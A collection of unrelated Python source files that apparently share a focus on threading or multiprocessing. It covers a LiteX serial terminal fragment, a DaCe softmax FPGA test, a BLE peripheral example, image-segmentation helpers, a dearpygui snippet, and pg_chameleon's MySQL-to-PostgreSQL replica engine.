b = self.console.getkey()
if b == b"\x03":
self.stop()
elif b == b"\n":
self.port.write(b"\x0a")
else:
self.port.write(b)
except:
self.writer_alive = False
self.console.unconfigure()
raise
def start_writer(self):
self.writer_alive = True
self.writer_thread = threading.Thread(target=self.writer)
self.writer_thread.setDaemon(True)
self.writer_thread.start()
def stop_writer(self):
self.writer_alive = False
self.writer_thread.join()
def start(self):
print("[LXTERM] Starting....")
self.start_reader()
self.start_writer()
def stop(self):
self.reader_alive = False
self.writer_alive = False
def join(self, writer_only=False):
self.writer_thread.join()
if not writer_only:
self.reader_thread.join()
def _get_args():
parser = argparse.ArgumentParser()
parser.add_argument("port", help="serial port")
parser.add_argument("--speed", default=115200, help="serial baudrate")
parser.add_argument("--serial-boot", default=False, action='store_true',
help="automatically initiate serial boot")
parser.add_argument("--kernel", default=None, help="kernel image")
parser.add_argument("--kernel-adr", default="0x40000000", help="kernel address")
parser.add_argument("--images", default=None, help="json description of the images to load to memory")
parser.add_argument("--no-crc", default=False, action='store_true', help="disable CRC check (speedup serialboot)")
return parser.parse_args()
def main():
args = _get_args()
term = LiteXTerm(args.serial_boot, args.kernel, args.kernel_adr, args.images, args.no_crc)
term.open(args.port, int(float(args.speed)))
term.console.configure()
term.start()
term.join(True)
if __name__ == "__main__":
main()
|
test_softmax_fpga.py
|
# Simple test for softmax for FPGA
# NOTE: for the moment being it supports only the last axis
# TODO: add more tests
from dace.transformation.interstate import FPGATransformSDFG, InlineSDFG
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from daceml.pytorch import DaceModule, dace_module
import argparse
import pytest
from multiprocessing import Process, Queue
import dace
class Model(nn.Module):
def __init__(self, axis):
super(Model, self).__init__()
self.axis = axis
def forward(self, x):
x = F.softmax(x, dim=self.axis)
return x
def run(data_shape: tuple, axis, queue=None):
ptmodel = Model(axis)
x = torch.rand(data_shape, )
dace_model = DaceModule(ptmodel, auto_optimize=False)
import daceml.onnx as donnx
with dace.library.change_default(donnx.ONNXSoftmax, "pure"):
dace_output = dace_model(x)
torch_output = ptmodel(x)
assert np.allclose(torch_output.detach().numpy(), dace_output, atol=1e-06)
##########################################
# Transform to FPGA
def TransformToFPGA(dace_module):
'''
Transforms the given module to run on FPGA.
This includes library node expansions.
:param dace_module:
:return:
'''
sdfg = dace_module.sdfg
sdfg.apply_transformations([FPGATransformSDFG, InlineSDFG])
sdfg.expand_library_nodes()
sdfg.apply_transformations_repeated([InlineSDFG])
# Reset the SDFG
dace_model.reset_sdfg()
# Append transformation hook
dace_model.append_post_onnx_hook("TransformToFPGA", TransformToFPGA)
# Execute Module with FPGA expansion
with dace.library.change_default(donnx.ONNXSoftmax, "fpga"):
dace_output_fpga = dace_model(torch.clone(x)).numpy()
diff = np.linalg.norm(torch_output.detach().numpy() -
dace_output_fpga) / dace_output_fpga.size
print("Difference: ", diff)
if queue is not None:
# we are testing
queue.put(diff)
else:
if diff > 1e-6:
import pdb
pdb.set_trace()
assert (False)
del dace_model, ptmodel, x
@pytest.mark.fpga
def test():
data_shape = (1000, 10, 10)
# Multiprocess is needed for testing otherwise Intel Compiler mess up with threads
queue = Queue()
p = Process(target=run, args=(data_shape, 2, queue))
p.start()
p.join()
assert (queue.get() < 1e-6)
#TODO: add more tests
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("W",
type=int,
nargs="?",
default=1,
help="Vectorization width")
parser.add_argument("-test",
action="store_true",
default=False,
help="Perform tests (USE ONLY WITH EMULATION)")
args = vars(parser.parse_args())
vec_width = args["W"]
t = args["test"]
if t:
test()
else:
data_shape = (1000, 10, 10)
run(data_shape, 2)
|
peripheral.py
|
"""
This example exhibits some of the functionality of a peripheral BLE device,
such as reading, writing and notifying characteristics.
This peripheral can be used with one of the central examples running on a separate nordic device,
or can be run with the nRF Connect app to explore the contents of the service
"""
import atexit
import struct
import threading
import time
from blatann import BleDevice
from blatann.examples import example_utils, constants
from blatann.gap import advertising, smp, IoCapabilities
from blatann.waitables import GenericWaitable
logger = example_utils.setup_logger(level="DEBUG")
def on_connect(peer, event_args):
"""
Event callback for when a central device connects to us
:param peer: The peer that connected to us
:type peer: blatann.peer.Client
:param event_args: None
"""
if peer:
logger.info("Connected to peer")
else:
logger.warning("Connection timed out")
def on_disconnect(peer, event_args):
"""
Event callback for when the client disconnects from us (or when we disconnect from the client)
:param peer: The peer that disconnected
:type peer: blatann.peer.Client
:param event_args: The event args
:type event_args: blatann.event_args.DisconnectionEventArgs
"""
logger.info("Disconnected from peer, reason: {}".format(event_args.reason))
def on_hex_conversion_characteristic_write(characteristic, event_args):
"""
Event callback for when the client writes to the hex conversion characteristic.
This takes the data written, converts it to the hex representation, and updates the characteristic
with this new value. If the client is subscribed to the characteristic, the client will be notified.
:param characteristic: The hex conversion characteristic
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
:param event_args: the event arguments
:type event_args: blatann.event_args.WriteEventArgs
"""
logger.info("Got characteristic write - characteristic: {}, data: 0x{}".format(characteristic.uuid,
str(event_args.value).encode("hex")))
new_value = "{}".format(str(event_args.value).encode("hex"))
characteristic.set_value(new_value[:characteristic.max_length], notify_client=True)
def on_gatts_subscription_state_changed(characteristic, event_args):
"""
Event callback for when a client subscribes or unsubscribes from a characteristic. This
is the equivalent to when a client writes to a CCCD descriptor on a characteristic.
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
:type event_args: blatann.event_args.SubscriptionStateChangeEventArgs
"""
logger.info("Subscription state changed - characteristic: {}, state: {}".format(characteristic.uuid, event_args.subscription_state))
def on_time_char_read(characteristic, event_args):
"""
Event callback for when the client reads our time characteristic. Gets the current time and updates the characteristic.
This demonstrates "lazy evaluation" of characteristics--instead of having to constantly update this characteristic,
it is only updated when read/observed by an outside actor.
:param characteristic: the time characteristic
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
:param event_args: None
"""
t = time.time()
ms = int((t * 1000) % 1000)
msg = "Time: {}.{:03}".format(time.strftime("%H:%M:%S", time.localtime(t)), ms)
characteristic.set_value(msg)
def on_client_pairing_complete(peer, event_args):
"""
Event callback for when the pairing process completes with the client
:param peer: the peer that completed pairing
:type peer: blatann.peer.Client
:param event_args: the event arguments
:type event_args: blatann.event_args.PairingCompleteEventArgs
"""
logger.info("Client Pairing complete, status: {}".format(event_args.status))
def on_passkey_display(peer, event_args):
"""
Event callback that is called when a passkey is required to be displayed to a user
for the pairing process.
:param peer: The peer the passkey is for
:type peer: blatann.peer.Client
:param event_args: The event args
:type event_args: blatann.event_args.PasskeyDisplayEventArgs
"""
logger.info("Passkey display: {}, match: {}".format(event_args.passkey, event_args.match_request))
class CountingCharacteristicThread(object):
"""
Thread which updates the counting characteristic and notifies
the client each time its updated.
This also demonstrates the notification queuing functionality--if a notification/indication
is already in progress, future notifications will be queued and sent out when the previous ones complete.
"""
def __init__(self, characteristic):
"""
:param characteristic: the counting characteristic
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
"""
self.current_value = 0
self._stop_event = threading.Event()
self._stopped = threading.Event()
self.characteristic = characteristic
self.characteristic.on_notify_complete.register(self._on_notify_complete)
self.thread = threading.Thread(target=self.run)
atexit.register(self.join)
self.thread.daemon = True
self.thread.start()
def join(self):
"""
Used to stop and join the thread
"""
self._stop_event.set()
self._stopped.wait(3)
def _on_notify_complete(self, characteristic, event_args):
"""
Event callback that is triggered when the notification finishes sending
:param characteristic: The characteristic the notification was on
:type characteristic: blatann.gatt.gatts.GattsCharacteristic
:param event_args: The event arguments
:type event_args: blatann.event_args.NotificationCompleteEventArgs
"""
logger.info("Notification Complete, id: {}, reason: {}".format(event_args.id, event_args.reason))
def run(self):
while not self._stop_event.is_set():
try:
if not self.characteristic.client_subscribed: # Do nothing until a client is subscribed
time.sleep(1)
continue
# Increment the value and pack it
self.current_value += 1
value = struct.pack("<I", self.current_value)
# Send out a notification of this new value
waitable = self.characteristic.notify(value)
# Send a burst of 16, then wait for them all to send before trying to send more
if self.current_value % 16 == 0:
waitable.wait()
time.sleep(1) # Wait a second before sending out the next burst
except Exception as e:
logger.exception(e)
self._stopped.set()
def main(serial_port):
# Create and open the device
ble_device = BleDevice(serial_port)
ble_device.open()
# Set up desired security parameters
ble_device.client.security.set_security_params(passcode_pairing=False, bond=False,
io_capabilities=IoCapabilities.DISPLAY_ONLY, out_of_band=False)
ble_device.client.security.on_pairing_complete.register(on_client_pairing_complete)
ble_device.client.security.on_passkey_display_required.register(on_passkey_display)
# Create and add the math service
service = ble_device.database.add_service(constants.MATH_SERVICE_UUID)
# Create and add the hex conversion characteristic to the service
hex_conv_char = service.add_characteristic(constants.HEX_CONVERT_CHAR_UUID,
constants.HEX_CONVERT_CHAR_PROPERTIES, "Test Data")
# Register the callback for when a write occurs and subscription state changes
hex_conv_char.on_write.register(on_hex_conversion_characteristic_write)
hex_conv_char.on_subscription_change.register(on_gatts_subscription_state_changed)
# Create and add the counting characteristic, initializing the data to [0, 0, 0, 0]
counting_char = service.add_characteristic(constants.COUNTING_CHAR_UUID, constants.COUNTING_CHAR_PROPERTIES, [0]*4)
counting_char.on_subscription_change.register(on_gatts_subscription_state_changed)
# Create the thread for the counting characteristic
counting_char_thread = CountingCharacteristicThread(counting_char)
# Create and add the time service
time_service = ble_device.database.add_service(constants.TIME_SERVICE_UUID)
# Add the time characteristic and register the callback for when its read
time_char = time_service.add_characteristic(constants.TIME_CHAR_UUID, constants.TIME_CHAR_PROPERTIES, "Time")
time_char.on_read.register(on_time_char_read)
# Initialize the advertising and scan response data
adv_data = advertising.AdvertisingData(local_name=constants.PERIPHERAL_NAME, flags=0x06)
scan_data = advertising.AdvertisingData(service_uuid128s=constants.TIME_SERVICE_UUID, has_more_uuid128_services=True)
ble_device.advertiser.set_advertise_data(adv_data, scan_data)
# Start advertising
logger.info("Advertising")
ble_device.client.on_connect.register(on_connect)
ble_device.client.on_disconnect.register(on_disconnect)
ble_device.advertiser.start(timeout_sec=0, auto_restart=True)
# Create a waitable that will never fire, and wait for some time
w = GenericWaitable()
w.wait(60*30, exception_on_timeout=False) # Keep device active for 30 mins
# Cleanup
counting_char_thread.join()
logger.info("Done")
ble_device.close()
if __name__ == '__main__':
main("COM49")
|
utils_test.py
|
import cv2
from queue import Queue
from threading import Thread
import os
from config import imshape
import json
import numpy as np
from config import hues, labels, imshape, mode
import pydensecrf.densecrf as dcrf
from pydensecrf.utils import unary_from_softmax
from tensorflow.keras.utils import to_categorical
class VideoStream:
# self.queue = Queue(maxsize=size)
def get_frame(self):
return self.cv2.imread('./images/1.png')
#self.stream.set(cv2.CAP_PROP_FPS, 10)
# self.stopped = False
# self.queue = Queue(maxsize=size)
#def start(self):
# thread = Thread(target=self.update, args=())
# thread.daemon = True
# thread.start()
# return self
#def update(self):
# while self.stopped is False:
# if not self.queue.full():
# (grabbed, frame) = self.stream.read()
# if not grabbed:
# self.stop()
# return
# self.queue.put(frame)
#def read(self):
# return self.queue.get()
#def check_queue(self):
# return self.queue.qsize() > 0
#def stop(self):
# self.stopped = True
# self.stream.release()
def generate_missing_json():
# creates a background json for the entire image if missing
# this assumes you will never annotate a background class
for im in os.listdir('images'):
fn = im.split('.')[0]+'.json'
path = os.path.join('annotated', fn)
if os.path.exists(path) is False:
json_dict = {}
# these points might be reversed if not using a square image (idk)
json_dict['shapes'] = [{"label": "background",
"points": [[0,0],
[0, imshape[0]-1],
[imshape[0]-1, imshape[1]-1],
[imshape[0]-1, 0]]
}]
with open(path, 'w') as handle:
json.dump(json_dict, handle, indent=2)
#def add_masks(pred):
# blank = np.zeros(shape=imshape, dtype=np.uint8)
# for i, label in enumerate(labels):
# hue = np.full(shape=(imshape[0], imshape[1]), fill_value=hues[label], dtype=np.uint8)
# sat = np.full(shape=(imshape[0], imshape[1]), fill_value=255, dtype=np.uint8)
# val = pred[:,:,i].astype(np.uint8)
# im_hsv = cv2.merge([hue, sat, val])
# im_rgb = cv2.cvtColor(im_hsv, cv2.COLOR_HSV2RGB)
# blank = cv2.add(blank, im_rgb)
#
# return blank
def add_masks(pred):
blank = np.zeros(shape=imshape, dtype=np.uint8)
for i, label in enumerate(labels):
hue = np.full(shape=(imshape[0], imshape[1]), fill_value=hues[label], dtype=np.uint8)
sat = np.full(shape=(imshape[0], imshape[1]), fill_value=255, dtype=np.uint8)
val = pred[:,:,i].astype(np.uint8)
im_hsv = cv2.merge([hue, sat, val])
im_rgb = cv2.cvtColor(im_hsv, cv2.COLOR_HSV2RGB)
blank = cv2.add(blank, im_rgb)
return blank
def crf(im_softmax, im_rgb):
n_classes = im_softmax.shape[2]
feat_first = im_softmax.transpose((2, 0, 1)).reshape(n_classes, -1)
unary = unary_from_softmax(feat_first)
unary = np.ascontiguousarray(unary)
im_rgb = np.ascontiguousarray(im_rgb)
d = dcrf.DenseCRF2D(im_rgb.shape[1], im_rgb.shape[0], n_classes)
d.setUnaryEnergy(unary)
d.addPairwiseGaussian(sxy=(5, 5), compat=3, kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# This adds the color-dependent term, i.e. features are (x,y,r,g,b).
d.addPairwiseBilateral(sxy=(5, 5), srgb=(13, 13, 13), rgbim=im_rgb,
compat=10,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
Q = d.inference(5)
res = np.argmax(Q, axis=0).reshape((im_rgb.shape[0], im_rgb.shape[1]))
if mode is 'binary':
return res * 255.0
if mode is 'multi':
res_hot = to_categorical(res) * 255.0
res_crf = add_masks(res_hot)
return res_crf
|
multi.py
|
import dearpygui.core as core
import time
import multiprocessing
def t1():
core.set_vsync(True)
core.add_window("##base", no_background=True)
core.start_dearpygui(primary_window="##base")
def t2():
core.set_vsync(True)
core.add_window("##base")
core.start_dearpygui(primary_window="##base")
if __name__ == "__main__":
multiprocessing.Process(target=t1).start()
# multiprocessing.Process(target=t2).start()
t2()
|
global_lib.py
|
import rollbar
import pprint
import yaml
import os, os.path
import sys
import time
import signal
from shutil import copy
from distutils.sysconfig import get_python_lib
from tabulate import tabulate
from pg_chameleon import pg_engine, mysql_source, pgsql_source
import logging
from logging.handlers import TimedRotatingFileHandler
from daemonize import Daemonize
import multiprocessing as mp
import traceback
class rollbar_notifier(object):
"""
This class is used to send messages to rollbar whether the key and environment variables are set
"""
def __init__(self, rollbar_key, rollbar_env, rollbar_level, logger):
"""
Class constructor.
"""
self.levels = {
"critical": 1,
"error": 2,
"warning": 3,
"info": 5
}
self.rollbar_level = self.levels[rollbar_level]
self.logger = logger
self.notifier = rollbar
if rollbar_key !='' and rollbar_env != '':
self.notifier.init(rollbar_key, rollbar_env)
else:
self.notifier = None
def send_message(self, message, level):
"""
The method sends a message to rollbar. If it fails it just logs an error
without causing the process to crash.
"""
if self.notifier:
exc_info = sys.exc_info()
try:
notification_level = self.levels[level]
if notification_level <= self.rollbar_level:
try:
self.notifier.report_message(message, level)
if exc_info[0]:
self.notifier.report_exc_info(exc_info)
except:
self.logger.error("Could not send the message to rollbar.")
except:
self.logger.error("Wrong rollbar level specified.")
class replica_engine(object):
"""
This class is wraps the the mysql and postgresql engines in order to perform the various activities required for the replica.
The constructor inits the global configuration class and setup the mysql and postgresql engines as class objects.
The class sets the logging using the configuration parameter.
"""
def __init__(self, args):
"""
Class constructor.
"""
if os.geteuid()==0:
print ("pg_chameleon cannot be run as root")
sys.exit(10)
self.catalog_version = '2.0.7'
self.upgradable_version = '1.7'
self.lst_yes= ['yes', 'Yes', 'y', 'Y']
python_lib=os.path.dirname(os.path.realpath(__file__))
cham_dir = "%s/.pg_chameleon" % os.path.expanduser('~')
local_conf = "%s/configuration/" % cham_dir
self.global_conf_example = '%s/../configuration/config-example.yml' % python_lib
self.local_conf_example = '%s/config-example.yml' % local_conf
local_logs = "%s/logs/" % cham_dir
local_pid = "%s/pid/" % cham_dir
self.conf_dirs=[
cham_dir,
local_conf,
local_logs,
local_pid,
]
self.args = args
self.source = self.args.source
if self.args.command == 'set_configuration_files':
self.set_configuration_files()
sys.exit()
self.__set_conf_permissions(cham_dir)
self.load_config()
log_list = self.__init_logger("global")
self.logger = log_list[0]
self.logger_fds = log_list[1]
#notifier configuration
self.notifier = rollbar_notifier(self.config["rollbar_key"],self.config["rollbar_env"] , self.args.rollbar_level , self.logger )
#pg_engine instance initialisation
self.pg_engine = pg_engine()
self.pg_engine.dest_conn = self.config["pg_conn"]
self.pg_engine.logger = self.logger
self.pg_engine.source = self.args.source
self.pg_engine.full = self.args.full
self.pg_engine.type_override = self.config["type_override"]
self.pg_engine.sources = self.config["sources"]
self.pg_engine.notifier = self.notifier
try:
self.pg_engine.migrate_default_value = self.config["sources"][self.source]["migrate_default_value"]
except KeyError:
self.pg_engine.migrate_default_value = True
#mysql_source instance initialisation
self.mysql_source = mysql_source()
self.mysql_source.source = self.args.source
self.mysql_source.tables = self.args.tables
self.mysql_source.schema = self.args.schema.strip()
self.mysql_source.pg_engine = self.pg_engine
self.mysql_source.logger = self.logger
self.mysql_source.sources = self.config["sources"]
self.mysql_source.type_override = self.config["type_override"]
self.mysql_source.notifier = self.notifier
#pgsql_source instance initialisation
self.pgsql_source = pgsql_source()
self.pgsql_source.source = self.args.source
self.pgsql_source.tables = self.args.tables
self.pgsql_source.schema = self.args.schema.strip()
self.pgsql_source.pg_engine = self.pg_engine
self.pgsql_source.logger = self.logger
self.pgsql_source.sources = self.config["sources"]
self.pgsql_source.type_override = self.config["type_override"]
self.pgsql_source.notifier = self.notifier
catalog_version = self.pg_engine.get_catalog_version()
#safety checks
if self.args.command == 'upgrade_replica_schema':
self.pg_engine.sources = self.config["sources"]
print("WARNING, entering upgrade mode. Disabling the catalogue version's check. Expected version %s, installed version %s" % (self.catalog_version, catalog_version))
elif self.args.command == 'enable_replica' and self.catalog_version != catalog_version:
print("WARNING, catalogue mismatch. Expected version %s, installed version %s" % (self.catalog_version, catalog_version))
else:
if catalog_version:
if self.catalog_version != catalog_version:
print("FATAL, replica catalogue version mismatch. Expected %s, got %s" % (self.catalog_version, catalog_version))
sys.exit()
if self.args.source != '*' and self.args.command != 'add_source':
self.pg_engine.connect_db()
source_count = self.pg_engine.check_source()
self.pg_engine.disconnect_db()
if source_count == 0:
print("FATAL, The source %s is not registered. Please add it add_source" % (self.args.source))
sys.exit()
def terminate_replica(self, signal, frame):
"""
Stops gracefully the replica.
"""
self.logger.info("Caught stop replica signal terminating daemons and ending the replica process.")
self.read_daemon.terminate()
self.replay_daemon.terminate()
self.pg_engine.connect_db()
self.pg_engine.set_source_status("stopped")
sys.exit(0)
def set_configuration_files(self):
"""
The method loops the list self.conf_dirs creating them only if they are missing.
The method checks the freshness of the config-example.yaml and connection-example.yml
copies the new version from the python library determined in the class constructor with get_python_lib().
If the configuration file is missing the method copies the file with a different message.
"""
for confdir in self.conf_dirs:
if not os.path.isdir(confdir):
print ("creating directory %s" % confdir)
os.mkdir(confdir)
if os.path.isfile(self.local_conf_example):
print ("updating configuration example with %s" % self.local_conf_example)
else:
print ("copying configuration example in %s" % self.local_conf_example)
copy(self.global_conf_example, self.local_conf_example)
def load_config(self):
"""
The method loads the configuration from the file specified in the args.config parameter.
"""
local_confdir = "%s/.pg_chameleon/configuration/" % os.path.expanduser('~')
self.config_file = '%s/%s.yml'%(local_confdir, self.args.config)
if not os.path.isfile(self.config_file):
print("**FATAL - configuration file missing. Please ensure the file %s is present." % (self.config_file))
sys.exit()
config_file = open(self.config_file, 'r')
self.config = yaml.load(config_file.read(), Loader=yaml.FullLoader)
config_file.close()
def show_sources(self):
"""
The method shows the sources available in the configuration file.
"""
for item in self.config["sources"]:
print("\n")
print (tabulate([], headers=["Source %s" % item]))
tab_headers = ['Parameter', 'Value']
tab_body = []
source = self.config["sources"][item]
config_list = [param for param in source if param not in ['db_conn']]
connection_list = [param for param in source["db_conn"] if param not in ['password']]
for parameter in config_list:
tab_row = [parameter, source[parameter]]
tab_body.append(tab_row)
for param in connection_list:
tab_row = [param, source["db_conn"][param]]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers))
def show_config(self):
"""
The method loads the current configuration and displays the status in tabular output
"""
config_list = [item for item in self.config if item not in ['pg_conn', 'sources', 'type_override']]
connection_list = [item for item in self.config["pg_conn"] if item not in ['password']]
type_override = pprint.pformat(self.config['type_override'], width = 20)
tab_body = []
tab_headers = ['Parameter', 'Value']
for item in config_list:
tab_row = [item, self.config[item]]
tab_body.append(tab_row)
for item in connection_list:
tab_row = [item, self.config["pg_conn"][item]]
tab_body.append(tab_row)
tab_row = ['type_override', type_override]
tab_body.append(tab_row)
print(tabulate(tab_body, headers=tab_headers))
self.show_sources()
def create_replica_schema(self):
"""
The method creates the replica schema in the destination database.
"""
self.logger.info("Trying to create replica schema")
self.pg_engine.create_replica_schema()
def drop_replica_schema(self):
"""
The method removes the replica schema from the destination database.
"""
self.logger.info("Dropping the replica schema")
self.pg_engine.drop_replica_schema()
def add_source(self):
"""
The method adds a new replication source. A pre existence check is performed
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
else:
self.logger.info("Trying to add a new source")
self.pg_engine.add_source()
def drop_source(self):
"""
The method removes a replication source from the catalogue.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
else:
drp_msg = 'Dropping the source %s will remove drop any replica reference.\n Are you sure? YES/No\n' % self.args.source
drop_src = input(drp_msg)
if drop_src == 'YES':
self.logger.info("Trying to remove the source")
self.pg_engine.drop_source()
elif drop_src in self.lst_yes:
print('Please type YES all uppercase to confirm')
def enable_replica(self):
"""
The method resets the source status to stopped and disables any leftover maintenance mode
"""
self.pg_engine.connect_db()
self.pg_engine.set_source_status("stopped")
self.pg_engine.end_maintenance()
def init_replica(self):
"""
The method initialise a replica for a given source and configuration.
It is compulsory to specify a source name when running this method.
The method checks the source type and calls the corresponding initialisation's method.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
elif self.args.tables != "*":
print("You cannot specify a table name when running init_replica.")
else:
try:
source_type = self.config["sources"][self.args.source]["type"]
except KeyError:
print("The source %s doesn't exists." % (self.args.source))
sys.exit()
self.__stop_replica()
if source_type == "mysql":
self.__init_mysql_replica()
elif source_type == "pgsql":
self.__init_pgsql_replica()
def __init_mysql_replica(self):
"""
The method initialise a replica for a given mysql source within the specified configuration.
The method is called by the public method init_replica.
"""
if self.args.debug:
self.mysql_source.init_replica()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Init replica process for source %s started." % (self.args.source))
keep_fds = [self.logger_fds]
init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
self.logger.info("Initialising the replica for source %s" % self.args.source)
init_daemon = Daemonize(app="init_replica", pid=init_pid, action=self.mysql_source.init_replica, foreground=foreground , keep_fds=keep_fds)
init_daemon.start()
def __init_pgsql_replica(self):
"""
The method initialise a replica for a given postgresql source within the specified configuration.
The method is called by the public method init_replica.
"""
if self.args.debug:
self.pgsql_source.init_replica()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Init replica process for source %s started." % (self.args.source))
keep_fds = [self.logger_fds]
init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
self.logger.info("Initialising the replica for source %s" % self.args.source)
init_daemon = Daemonize(app="init_replica", pid=init_pid, action=self.pgsql_source.init_replica, foreground=foreground , keep_fds=keep_fds)
init_daemon.start()
def refresh_schema(self):
"""
The method reload the data from a source and only for a specified schema.
Is compulsory to specify a source name and an origin's schema name.
The schema mappings are honoured by the procedure automatically.
"""
if self.args.source == "*":
print("You must specify a source name using the argument --source")
elif self.args.schema == "*":
print("You must specify an origin's schema name using the argument --schema")
else:
self.__stop_replica()
if self.args.debug:
self.mysql_source.refresh_schema()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Sync tables process for source %s started." % (self.args.source))
keep_fds = [self.logger_fds]
init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
self.logger.info("The tables %s within source %s will be synced." % (self.args.tables, self.args.source))
sync_daemon = Daemonize(app="sync_tables", pid=init_pid, action=self.mysql_source.refresh_schema, foreground=foreground , keep_fds=keep_fds)
sync_daemon .start()
def sync_tables(self):
"""
The method reload the data from a source only for specified tables.
Is compulsory to specify a source name and at least one table name when running this method.
Multiple tables are allowed if comma separated.
"""
if self.args.source == "*":
print("You must specify a source name using the argument --source")
elif self.args.tables == "*":
print("You must specify one or more tables, in the form schema.table, separated by comma using the argument --tables")
else:
self.__stop_replica()
if self.args.debug:
self.mysql_source.sync_tables()
else:
if self.config["log_dest"] == 'stdout':
foreground = True
else:
foreground = False
print("Sync tables process for source %s started." % (self.args.source))
keep_fds = [self.logger_fds]
init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source))
self.logger.info("The tables %s within source %s will be synced." % (self.args.tables, self.args.source))
sync_daemon = Daemonize(app="sync_tables", pid=init_pid, action=self.mysql_source.sync_tables, foreground=foreground , keep_fds=keep_fds)
sync_daemon .start()
def __stop_all_active_sources(self):
"""
The method stops all the active sources within the target PostgreSQL database.
"""
active_source = self.pg_engine.get_active_sources()
for source in active_source:
self.source = source[0]
self.__stop_replica()
def upgrade_replica_schema(self):
"""
The method upgrades an existing replica catalogue to the newer version.
If the catalogue is from the previous version
"""
catalog_version = self.pg_engine.get_catalog_version()
if catalog_version == self.catalog_version:
print("The replica catalogue is already up to date.")
sys.exit()
else:
if catalog_version == self.upgradable_version:
upg_msg = 'Upgrading the catalogue %s to the version %s.\n Are you sure? YES/No\n' % (catalog_version, self.catalog_version)
upg_cat = input(upg_msg)
if upg_cat == 'YES':
self.logger.info("Performing the upgrade")
self.pg_engine.upgrade_catalogue_v1()
elif upg_cat in self.lst_yes:
print('Please type YES all uppercase to confirm')
elif catalog_version.split('.')[0] == '2' and catalog_version.split('.')[1] == '0':
print('Stopping all the active sources.')
self.__stop_all_active_sources()
print('Upgrading the replica catalogue. ')
self.pg_engine.upgrade_catalogue_v20()
else:
print('Wrong starting version. Expected %s, got %s' % (catalog_version, self.upgradable_version))
sys.exit()
def update_schema_mappings(self):
"""
The method updates the schema mappings for the given source.
The schema mappings is a configuration parameter but is stored in the replica
catalogue when the source is added. If any change is made on the configuration file this method
should be called to update the system catalogue as well. The pg_engine method checks for any conflict before running
the update on the tables t_sources and t_replica_tables.
Is compulsory to specify a source name when running this method.
"""
if self.args.source == "*":
print("You must specify a source name with the argument --source")
else:
self.__stop_replica()
self.pg_engine.update_schema_mappings()
def read_replica(self, queue, log_read):
"""
The method reads the replica stream for the given source and stores the row images
in the target postgresql database.
"""
if "keep_existing_schema" in self.config["sources"][self.args.source]:
keep_existing_schema = self.config["sources"][self.args.source]["keep_existing_schema"]
else:
keep_existing_schema = False
self.mysql_source.keep_existing_schema = keep_existing_schema
self.mysql_source.logger = log_read[0]
self.pg_engine.logger = log_read[0]
while True:
try:
self.mysql_source.read_replica()
time.sleep(self.sleep_loop)
except Exception:
queue.put(traceback.format_exc())
break
def replay_replica(self, queue, log_replay):
"""
The method replays the row images stored in the target postgresql database.
"""
self.pg_engine.logger = log_replay[0]
tables_error = []
self.pg_engine.connect_db()
self.pg_engine.set_source_id()
while True:
try:
tables_error = self.pg_engine.replay_replica()
if len(tables_error) > 0:
table_list = [item for sublist in tables_error for item in sublist]
tables_removed = "\n".join(table_list)
notifier_message = "There was an error during the replay of data. %s. The affected tables are no longer replicated." % (tables_removed)
self.logger.error(notifier_message)
self.notifier.send_message(notifier_message, 'error')
except Exception:
queue.put(traceback.format_exc())
break
time.sleep(self.sleep_loop)
def __run_replica(self):
"""
This method is the method which manages the two separate processes using the multiprocess library.
It can be daemonised or run in foreground according with the --debug configuration or the log
destination.
"""
if "auto_maintenance" not in self.config["sources"][self.args.source]:
auto_maintenance = "disabled"
else:
auto_maintenance = self.config["sources"][self.args.source]["auto_maintenance"]
if "gtid_enable" not in self.config["sources"][self.args.source]:
gtid_enable = False
else:
gtid_enable = self.config["sources"][self.args.source]["gtid_enable"]
self.mysql_source.gtid_enable = gtid_enable
log_read = self.__init_logger("read")
log_replay = self.__init_logger("replay")
signal.signal(signal.SIGINT, self.terminate_replica)
queue = mp.Queue()
self.sleep_loop = self.config["sources"][self.args.source]["sleep_loop"]
if self.args.debug:
check_timeout = self.sleep_loop
else:
check_timeout = self.sleep_loop*10
self.logger.info("Starting the replica daemons for source %s " % (self.args.source))
self.read_daemon = mp.Process(target=self.read_replica, name='read_replica', daemon=True, args=(queue, log_read,))
self.replay_daemon = mp.Process(target=self.replay_replica, name='replay_replica', daemon=True, args=(queue, log_replay,))
self.read_daemon.start()
self.replay_daemon.start()
while True:
read_alive = self.read_daemon.is_alive()
replay_alive = self.replay_daemon.is_alive()
if read_alive and replay_alive:
self.logger.debug("Replica process for source %s is running" % (self.args.source))
self.pg_engine.cleanup_replayed_batches()
else:
stack_trace = queue.get()
self.logger.error("Read process alive: %s - Replay process alive: %s" % (read_alive, replay_alive, ))
self.logger.error("Stack trace: %s" % (stack_trace, ))
if read_alive:
self.read_daemon.terminate()
self.logger.error("Replay daemon crashed. Terminating the read daemon.")
if replay_alive:
self.replay_daemon.terminate()
self.logger.error("Read daemon crashed. Terminating the replay daemon.")
if self.args.debug:
replica_status = "stopped"
else:
replica_status = "error"
try:
self.pg_engine.connect_db()
self.pg_engine.set_source_status(replica_status)
except:
pass
notifier_message = "The replica process crashed.\n Source: %s\n Stack trace: %s " %(self.args.source, stack_trace)
self.notifier.send_message(notifier_message, 'critical')
break
time.sleep(check_timeout)
if auto_maintenance != "disabled":
self.pg_engine.auto_maintenance = auto_maintenance
self.pg_engine.connect_db()
